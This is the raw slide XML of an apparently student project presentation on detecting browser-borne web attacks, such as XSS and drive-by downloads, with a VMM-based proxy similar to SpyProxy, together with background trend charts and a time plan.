                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>fewer modification probability</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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 smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74754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Problem to solve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Existing work and background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Your solution, including the VMM system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Task completed and remaining plan.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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Tasks  completed </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76802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altLang="zh-CN" smtClean="0"/>
              <a:t>Investigation of Related Topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web-plugin vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Webpage modification attacks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altLang="zh-CN" smtClean="0"/>
              <a:t>Design of defense systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Our web proxy (in previous slide)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Attack detection and rollbacking with transactional memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Get script codes from crawled web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr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Time plan</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78850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Week 7 and 8: Acquire SpyProxy and deploy it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Week 9: Analyze the script code for the filter to build a scalable proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Week 10: Preparation for the final report and presentation</a:t>
            </a:r>
          </a:p>
          <a:p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Web security problem</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="1285875"/>
            <a:ext cx="8389938" cy="4791075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>In the last few years, the popularity of web-based applications has grown tremendously. One key technology used in interactive web applications is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>The automatic execution of JavaScript code  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>provided by the remote server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t> may represent a possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vector for attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>on the end-user’s computing environment. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148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1D64E532-AFC5-4A1D-94A4-73466180F7E2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:t>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标题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 smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="内容占位符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zh-CN" smtClean="0"/>
              <a:t>Problem to solve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F83C16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Background and Existing work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F83C16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Existing work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F83C16"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Our solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Task completed and remaining plan.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Intra-Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Changes browser state or steals information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Out of Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Infects system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mtClean="0"/>
              <a:t>Intra-Browser Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11264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zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS (Cross-Site Scripting) steals information across protection domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Browser extensions which secretly send of parts of viewed pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
              <a:t>We don’t aim to prevent these with our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Attacks on the System </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>through the Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11469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zh-CN" smtClean="0"/>
              <a:t>Exploits:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Javascript engine bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Plug-in vulnerabilities (Java, Flash, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Installation of malicious, but signed, plug-ins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Goals: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Execution of arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>“Drive-by-download” installation of malware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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500063" y="-142875"/>
            <a:ext cx="8501062" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Trend of web security attack 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195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940B08A1-239D-46DE-B1F2-096EC5A21326}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN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71563"/>
            <a:ext cx="9144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矩形 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1571625" y="5929313"/>
            <a:ext cx="67945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altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Top 10 web application vulnerabilities for 2006 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altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP(Open Web Application Security Project ) Report</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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22533" name="矩形 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="928688" y="4357688"/>
            <a:ext cx="642937" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="sq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</a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="矩形 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1857375" y="4357688"/>
            <a:ext cx="500063" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="sq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</a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535" name="椭圆形标注 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1285875" y="928688"/>
            <a:ext cx="4000500" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46148"/>
              <a:gd name="adj2" fmla="val 112157"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="sq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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-site scripting(XSS) vulnerability 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altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>occupies the top most position</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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Trend of web security attack 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219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>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6D05E3A6-EEA4-4176-BE8C-1B1E9873B500}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN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57313"/>
            <a:ext cx="8996363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矩形 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-142875" y="5429250"/>
            <a:ext cx="9072563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altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Increasing trend in web application security vulnerabilities over a period of six years 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altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( Common  Weakness Enumeration)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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</TotalTime>
  <Words>1463</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>221</Paragraphs>
  <Slides>27</Slides>
  <Notes>24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主题</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>Detection of Attacks with Proxy-based Execution</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Web security problem</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Classification of Attacks</vt:lpstr>
      <vt:lpstr>Intra-Browser Attacks </vt:lpstr>
      <vt:lpstr>Attacks on the System  through the Browser</vt:lpstr>
      <vt:lpstr>Trend of web security attack 1</vt:lpstr>
      <vt:lpstr>Trend of web security attack 2</vt:lpstr>
      <vt:lpstr>XSS attacks</vt:lpstr>
      <vt:lpstr>XSS: Two kinds</vt:lpstr>
      <vt:lpstr>Stored XSS:More difficult to be detected and more harmful for Internet.</vt:lpstr>
      <vt:lpstr>Why difficult to detect</vt:lpstr>
      <vt:lpstr>Current method</vt:lpstr>
      <vt:lpstr>VMMs for Security</vt:lpstr>
      <vt:lpstr>Detecting Attacks with VMMs</vt:lpstr>
      <vt:lpstr>Detecting Attacks with VMMs</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>What we want to do</vt:lpstr>
      <vt:lpstr>Spyproxy</vt:lpstr>
      <vt:lpstr>Our System</vt:lpstr>
      <vt:lpstr>Comparison with SpyProxy</vt:lpstr>
      <vt:lpstr>Script code Filter</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Tasks  completed </vt:lpstr>
      <vt:lpstr>Time plan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hydro</dc:creator>
  <cp:lastModifiedBy>hydro</cp:lastModifiedBy>
  <cp:revision>135</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-07T16:27:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-02-12T18:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>